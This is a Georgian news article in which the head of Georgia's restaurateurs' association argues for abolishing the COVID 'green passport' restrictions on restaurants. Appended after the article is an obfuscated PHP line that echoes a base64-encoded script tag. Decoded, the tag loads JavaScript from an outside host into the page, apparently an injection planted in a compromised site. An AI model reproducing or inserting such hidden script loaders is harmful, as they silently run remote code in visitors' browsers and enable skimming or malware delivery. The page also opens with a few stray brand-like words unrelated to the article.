celsiusi
ავერსი შნაიდერი
რესტორნები „მწვანე პასპორტის“ გაუქმების მოთხოვნით გამოდიან. ამის შესახებ საქართველოს რესტორატორთა ასოციაციის“ დამფუძნებელი შოთა ბურჯანაძემ მედიაცენტრ „მთავარში“ ისაუბრა.
 
მისი განმარტებით, დღეს ეპიდემიოლოგიური მდგომარეობა თვითმართვის რეჟიმზეა და ამ პირობებში მხოლოდ რესტორნებისთვის „მწვანე პასპორტის“ სახით შეზღუდვების მოქმედება სფეროს და ქვეყნის ეკონომიკას მნიშვნელოვნად აზარალებს.
 
„დღეს ინფიცირების 18 000-ზე მეტი შემთხვევა გვაქვს და აბსოლუტურად ყველაფერი გახსნილია, რაც შეზღუდულია ეს სარესტორნო ბიზნესია, რაც ინფიცირების გავრცელების შეჩერებაში რაიმე როლს არ თამაშობს. დღეს „მწვანე პასპორტთან“ დაკავშირებული შეზღუდვები არაფრის მაქნისია და ეს ფურცელზე დაწერილი ფიქციაა. ამით მხოლოდ და მხოლოდ ეკონომიკა ჩერდება, იხურება რესტორნები და დასაქმებულები სამუშაო ადგილებს კარგავენ, ჩვენი სფეროდან პროფესიონალი კადრების ძალიან დიდი გადინებაა, რომლებიც 20 წლის განმავლობაში პროფესიულად იზრდებოდნენ. პრობლემა ძალიან დიდია და უაზრო სანქცია, რომელიც არაფერს აკეთებს, მხოლოდ ეკონომიკას აფერხებს. თუ სფეროს შევეხებით ძალიან ბევრი ობიექტი იხურება და ბევრი ადამიანი კარგავს სამუშაოს.“, - განაცხადა შოთა ბურჯანაძემ.
 
რესტორნების ასოციაციის ხელმძღვანელი თვლის, რომ მთავრობა და საკოორდინაციო საბჭო ამ პირობებში არა რომელიმე ბიზნესის შეზღუდვაზე, არამედ იმუნიზაციის მაჩვენებელის გაზრდაზე უნდა ზრუნავდეს. შოთა ბურჯანაძე მიიჩნევს რომ „მწვანე პასპორტების“ რეგულაციამ, რომელსაც საწყის ეტაპზე თავადაც მხარს უჭერდა თავისი ფუნქცია ვერ შესრულდა და ვაქცინაციის წახალისების მექანიზმი ვერ გახდა. მისი ინფორმაციით, თბილისში ამ შეზღუდვას რესტორნები მეტ-ნაკლებად ემორჩილებიან, თუმცა რეგიონებში „მწვანე პასპორტის“ მექანიზმი არ მოქმედებს.
 
„მივესალმები პრემიერ-მინისტრის მიდგომას, როდესაც მან ეკონომიკა გახსნა. და თუ დღეს არსებული „მწვანე პასპორტების“ შეზღუდვა მოიხსნება ჩვენ მრავალი ათასი ადამიანი სიცოცხლის, ჯანმრთელობის და სამუშაო ადგილების გადარჩენას შევძლებთ.
 
სარესტორნო ბიზნესის წარმომადგენლებს „მწვანე პასპორტის“ რეგულაციის მართვაში დიდი პასუხისმგებლობა ენიჭება. მაგრამ „მწვანე პასპორტის“ იდეა განხორციელებული არ არის, რადგან ადამიანები, რომლებიც რესტორანში მიდიან უნდა აკმაყოფილებდნენ ამ მოთხოვნებს, ხოლო იქ დამხვედრი არა. რა ლოგიკაა ეს? ჩემი მოთხოვნა იყო, რომ ორივე მხარისთვის მოგვეთხოვა „მწვანე პასპორტის“ ქონა, რაც ერთგვარად იმუნიზაციის წამახალისებელი უნდა გამხდარიყო, ეს ასე არ მოხდა და მწვანე პასპორტმა“ თავისი ფუნქცია ვერ შეასრულა.
 
დღეს სწორი გადაწყვეტილება ყველა შეზღუდვის მოხსნაა, რადგან ეს შეზღუდვები აღარ აკავებს ინფიცირების გავრცელებას. უნდა მივბაძოთ ინგლისს, ირლანდიას, ესპანეთის მაგალითებით, სადაც ეს შეზღუდვები იმიტომ მოიხსნა, რომ იმუნიზაცია მაღალ ნიშნულზეა. ხელისუფლების, საკოორდინაციო საბჭოს და იმნაძე-გამყრელიძეს ვალდებულებას იმუნიზაციის პროცესის დაჩქარებისთვის იბრძოლოს, წინააღმდეგ შემთხვევაში „მწვანე პასპორტები“, შეზღუდვები მხოლოდ ბარიერებს ქმნის, რომელიც სახელმწიფოსთვის, ბიზნესისთვის და სფეროსთვის მხოლოდ დაბრკოლებაა“, - განმარტა რესტორნების ასოციაციის ხელმძღვანელმა.
891
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");